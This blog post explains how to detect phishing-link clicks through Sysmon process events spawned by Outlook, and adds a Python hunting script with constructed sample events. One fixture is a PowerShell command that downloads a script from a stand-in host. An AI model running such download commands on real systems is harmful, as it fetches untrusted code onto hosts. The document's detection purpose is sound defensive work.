Hunting Phishing URLs in Emails with Sysmon

Mehmet Ergene
2 min read · Feb 11, 2019


Phishing emails are an important attack vector, and they are hard to detect. Thanks to Microsoft Sysmon, we can at least track and detect the moment a user acts on a phishing link on the endpoint.

Sample phishing URL scenario:
1. User receives an email that has a link in it.
2. User clicks the link.
3. User connects to the URL with the default browser.
4. Other actions are performed (file download, running malicious code, etc.).

Since the actions in step 4 vary from campaign to campaign, it is more practical to collect and analyze the URLs that users actually click in emails (steps 2 and 3) than to chase every possible follow-on action.

So, let’s look at what happens when a user clicks a link within Outlook. Outlook hands the URL to the default browser as a command-line argument, and Sysmon records that as a process creation event (Event ID 1). In the lab below the default browser is Internet Explorer, so the following event is generated:

ProcessId: 5552
Image: C:\Program Files\internet explorer\iexplore.exe
FileVersion: 11.00.17134.1 (WinBuild.160101.0800)
Description: Internet Explorer
Product: Internet Explorer
Company: Microsoft Corporation
CommandLine: "C:\Program Files\Internet Explorer\iexplore.exe" https://www.xyz.com/test/index.html
CurrentDirectory: C:\Users\vagrant.WINDOMAIN\Documents\
User: WINDOMAIN\vagrant
LogonGuid: {16886C20-BC08-5C5E-0000-0020BB98AA11}
LogonId: 0x11AA98BB
TerminalSessionId: 2
IntegrityLevel: High
Hashes: MD5=6465CB92B25A7BC1DF8E01D8AC5E7596,SHA256=C8DF7006DCB7239AA9CE3124F03B48613719D243C24D805483001D7006422C55
ParentProcessGuid: {16886C20-6192-5C61-0000-0010A0BDCB1A}
ParentProcessId: 12284
ParentImage: C:\Program Files\Microsoft Office\Office15\OUTLOOK.EXE
ParentCommandLine: "C:\Program Files\Microsoft Office\Office15\OUTLOOK.EXE"

The following part is important for us:

CommandLine: "C:\Program Files\Internet Explorer\iexplore.exe" https://www.xyz.com/test/index.html
ParentImage: C:\Program Files\Microsoft Office\Office15\OUTLOOK.EXE

Using this condition (a process whose parent is OUTLOOK.EXE and whose command line carries a URL), you can filter these events out of the Sysmon process creation log, parse the URL out of the command line, enrich it (domain reputation, domain age, categorization, etc.) and analyze it. Match on the parent image rather than the child, because the child changes with the default browser (iexplore.exe, chrome.exe, msedge.exe, firefox.exe). If Microsoft Safe Links is enabled, the command line will carry the rewritten safelinks.protection.outlook.com URL and the original target sits in its url query parameter, so decode it before enrichment. You can further correlate these events with the events generated in step 4 above: the browser’s network connections (Sysmon Event ID 3), file creations and any child processes it spawns.
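The hunting condition above, applied to Sysmon Event ID 1 records, as an added example that is not part of the original post. It parses the Windows event XML, keeps only children of OUTLOOK.EXE with a URL on the command line, unwraps Safe Links wrappers (the original target is in the url query parameter) and flags non-browser children. The sample events are constructed for the demo (the Edge `--single-argument` form and the `EXPECTED_BROWSERS` list are assumptions for this environment, not something the post states):

```python
"""Added example (not from the original post): hunt Sysmon Event ID 1 records
for URLs handed from OUTLOOK.EXE to a child process. Sample events are constructed."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse, parse_qs
from xml.sax.saxutils import escape

# Namespace used by Windows event XML (what Sysmon writes to the event log).
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)
# Assumption: the browsers Outlook is expected to hand a link to in this environment.
EXPECTED_BROWSERS = {"iexplore.exe", "chrome.exe", "msedge.exe", "firefox.exe"}


def parse_event(xml_text):
    """Flatten one Sysmon event into {field name: value}, including EventID."""
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    fields["EventID"] = root.find("e:System/e:EventID", NS).text
    return fields


def unwrap_safelinks(url):
    """Return the original target of a Safe Links wrapper, else the URL itself.
    Safe Links rewrites links to https://<region>.safelinks.protection.outlook.com/?url=<encoded>&..."""
    parsed = urlparse(url)
    if (parsed.hostname or "").lower().endswith(".safelinks.protection.outlook.com"):
        target = parse_qs(parsed.query).get("url")  # parse_qs already percent-decodes
        if target:
            return target[0]
    return url


def outlook_link_clicks(events):
    """The hunting condition: Event ID 1, parent is OUTLOOK.EXE, URL on the command line."""
    hits = []
    for ev in events:
        if ev.get("EventID") != "1":
            continue
        if not ev.get("ParentImage", "").lower().endswith("\\outlook.exe"):
            continue
        child = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        for raw in URL_RE.findall(ev.get("CommandLine", "")):
            url = unwrap_safelinks(raw)
            hits.append({
                "time": ev.get("UtcTime"),
                "user": ev.get("User"),
                "child": child,
                "expected_browser": child in EXPECTED_BROWSERS,
                "url": url,
                "host": urlparse(url).hostname,
                "safelinks_wrapped": url != raw,
            })
    return hits


def make_event(**fields):
    """Build a constructed Sysmon Event ID 1 record (minimal XML, not a real log)."""
    data = "".join(f'<Data Name="{k}">{escape(v)}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>1</EventID></System>'
            f"<EventData>{data}</EventData></Event>")


OUTLOOK = r"C:\Program Files\Microsoft Office\Office15\OUTLOOK.EXE"
SAMPLE_EVENTS = [  # constructed sample data
    make_event(UtcTime="2019-02-11 10:01:02.000", User=r"WINDOMAIN\vagrant",
               Image=r"C:\Program Files\internet explorer\iexplore.exe",
               CommandLine=r'"C:\Program Files\Internet Explorer\iexplore.exe" https://www.xyz.com/test/index.html',
               ParentImage=OUTLOOK),
    make_event(UtcTime="2019-02-11 10:05:40.000", User=r"WINDOMAIN\vagrant",
               Image=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
               CommandLine=r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument '
                           "https://nam02.safelinks.protection.outlook.com/?url=https%3A%2F%2Flogin-portal.example%2Fverify&data=05%7C01&reserved=0",
               ParentImage=OUTLOOK),
    make_event(UtcTime="2019-02-11 10:07:00.000", User=r"WINDOMAIN\vagrant",
               Image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
               CommandLine=r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://intranet.example/',
               ParentImage=r"C:\Windows\explorer.exe"),  # not launched by Outlook: ignored
    make_event(UtcTime="2019-02-11 10:09:15.000", User=r"WINDOMAIN\vagrant",
               Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               CommandLine=r'powershell.exe -c "iwr https://cdn.example/update.ps1"',
               ParentImage=OUTLOOK),  # URL present, but the child is not a browser
]


def hunt(xml_records):
    """Parse raw event XML and return the Outlook link-click hits."""
    return outlook_link_clicks(parse_event(x) for x in xml_records)


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        flag = "" if hit["expected_browser"] else "  <-- non-browser child of Outlook"
        print(f'{hit["time"]} {hit["user"]} {hit["child"]} -> {hit["host"]} ({hit["url"]}){flag}')
```

On a real host, feed `hunt()` the XML of Sysmon Event ID 1 records exported from Microsoft-Windows-Sysmon/Operational (for example with Get-WinEvent and ToXml()); the matching is on the parent image, so it keeps working when the default browser changes, and the unwrapped host is what you enrich and correlate with the browser’s Event ID 3 connections.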

An alternative method for detecting this activity is using Bro (Zeek) to log the URLs found in email bodies on the wire and correlating them with firewall/proxy logs, but you should be careful about encrypted traffic. Zeek only sees the message body if SMTP is not protected by TLS on the segment you monitor, and if you don’t perform HTTPS inspection on your firewall/proxy you see at most the destination hostname (from DNS or the TLS SNI), not the full URL, which makes this activity hard to detect.
